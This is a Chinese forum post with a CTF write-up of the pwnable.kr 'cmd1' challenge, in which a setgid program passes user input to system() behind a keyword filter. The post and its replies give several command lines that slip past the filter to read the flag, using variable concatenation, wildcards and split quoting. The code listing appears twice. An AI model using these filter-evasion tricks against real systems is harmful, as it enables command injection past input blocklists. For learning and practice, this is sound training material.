首页
社区
课程
招聘
[分享]pwnable.kr cmd1 day12
发表于: 2021-1-14 21:37 9068

[分享]pwnable.kr cmd1 day12

2021-1-14 21:37
9068

title

file_list

root 和 cmd1_pwn 用户对 flag 有读权限,cmd1 用户对 flag 无读权限,对 文件 cmd1 有执行权限,且文件 cmd1 组权限中有个 s,意味着当 cmd1 用户执行文件 cmd1 时,会临时拥有 cmd1_pwn 用户的权限。

程序会调用 system() 执行我们输入的 argv[1].
argv[1] 不能包含 flag、sh、tmp,所以考虑编写一个读取 flag 的 bash 脚本,直接在对应目录下用 ./ 执行脚本。

编写后记得赋予该文件可执行权限

/home/cmd1/cmd1 ./cmd1_21
flag

 
#include <stdio.h>
#include <string.h>
 
int filter(char* cmd){
        // 过滤 "flag","sh","tmp" 字符串
 
        int r=0;
        r += strstr(cmd, "flag")!=0// 该函数返回在 cmd 中第一次出现 "flag" 字符串的位置,如果未找到则返回 null
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
        putenv("PATH=/thankyouverymuch");   // int putenv(const char * string);  改变或增加环境变量的内容.返回值:执行成功则返回0, 有错误发生则返回-1.
        if(filter(argv[1])) return 0;
        system( argv[1] ); 
        return 0;
}
#include <stdio.h>
#include <string.h>
 
int filter(char* cmd){
        // 过滤 "flag","sh","tmp" 字符串
 
        int r=0;
        r += strstr(cmd, "flag")!=0// 该函数返回在 cmd 中第一次出现 "flag" 字符串的位置,如果未找到则返回 null

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2021-1-15 19:48 被cease2e编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (4)
雪    币: 5270
活跃值: (3505)
能力值: ( LV7,RANK:117 )
在线值:
发帖
回帖
粉丝
2
我在做这题发现,做一个命令的拼接也能过掉过滤
把/bin/cat flag改写成
./cmd1 'var1="/bin/cat fl";var2="ag";$var1$var2'
2021-1-20 17:15
0
雪    币: 47
活跃值: (3673)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
3
鬼才zxy 我在做这题发现,做一个命令的拼接也能过掉过滤[em_86] 把/bin/cat flag改写成 ./cmd1 'var1="/bin/cat fl";var2="ag ...
2021-1-21 13:30
0
雪    币: 25
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
4
鬼才zxy 我在做这题发现,做一个命令的拼接也能过掉过滤[em_86] 把/bin/cat flag改写成 ./cmd1 'var1="/bin/cat fl";var2="ag ...
改成这几种应该也可以:
/bin/cat /home/cmd1/??ag
/bin/cat /home/cmd1/fl*
/bin/cat /home/cmd1/fla""g
/bin/cat /home/cmd1/fla''g
/bin/cat /home/cmd1/fla\g
/bin/cat /home/cmd1/fl$1ag

2021-1-25 16:03
1
雪    币: 47
活跃值: (3673)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
5
pwnooooo 改成这几种应该也可以: /bin/cat /home/cmd1/??ag /bin/cat /home/cmd1/fl* /bin/cat /home/cmd1/fla""g ...
2021-1-30 18:28
0
游客
登录 | 注册 方可回帖
返回
//